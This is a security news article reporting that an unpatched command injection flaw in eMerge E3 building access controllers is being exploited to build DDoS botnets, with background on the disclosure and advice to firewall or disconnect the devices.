Vulnerabilities in eMerge E3 building access control systems are being exploited by hackers for DDoS attacks. The vulnerabilities were discovered in May 2019, but they have been left unpatched.
Linear eMerge E3
eMerge is an access controller that specifies which doors to rooms or buildings a person can open at specified times. These systems are used for commercial and industrial buildings to secure facilities and provide secure access to employees. Employees gain access using access codes or smart cards.
The eMerge E3 versions affected by the vulnerabilities are versions 1.00-06 and below. Researchers from Applied Risk, a cyber security firm specializing in industrial security service, identified 10 vulnerabilities in the eMerge E3 system. Furthermore, Applied Risk disclosed the details of the vulnerabilities back in May 2019. However, to date no patches have been provided by Nortek Security & Control (NSC), the product owner, to fix these vulnerabilities.
Moreover, as these systems can be managed from a browser, hackers have been using these internet interfaces to compromise devices. Hackers have already compromised over 2,300 eMerge E3 systems.
Exploitation of eMerge E3 Vulnerabilities
According to a report published by Sonic Wall last week, hackers are searching the internet for eMerge systems to exploit. They are using a command injection flaw in the building access control systems to gain access to companies’ application data and networks.
This vulnerability is one of two that received a high severity vulnerability score. This is because it can be exploited remotely, even by low-skilled attackers with little to no technical knowledge. The Sonic Wall report states that hackers are targeting some 100 countries. Most of the attacks are occurring in the US.
According to Sonic Wall “this issue is triggered due to insufficient sanitizing of user-supplied inputs to a PHP function allowing arbitrary command execution with root privileges. A remote unauthenticated attacker can exploit this to execute arbitrary commands within the context of the application, via a crafted HTTP request.”
eMerge E3 Dependent DDoS Attacks
Hackers are using the command injection flaw to take over eMerge E3 devices. These compromised devises are then being used to download and install malware, and then launch DDoS attacks on other targets.
A command injection flaw is a web security vulnerability that allows attackers to execute operating system commands on the server running the application. In so doing the hacker can fully compromise the application and all its data.
Safeguarding Against eMerge E3 Dependent DDoS Attacks
Attacks using command injection flaws on eMerge E3 devices were first witnessed on 9 January 2020. They have continued in a constant stream since. System administrators in charge of networks on which eMerge E3 devices are installed are advised to remove these systems from the internet. If not, at least control access to these devices using a firewall or VPN.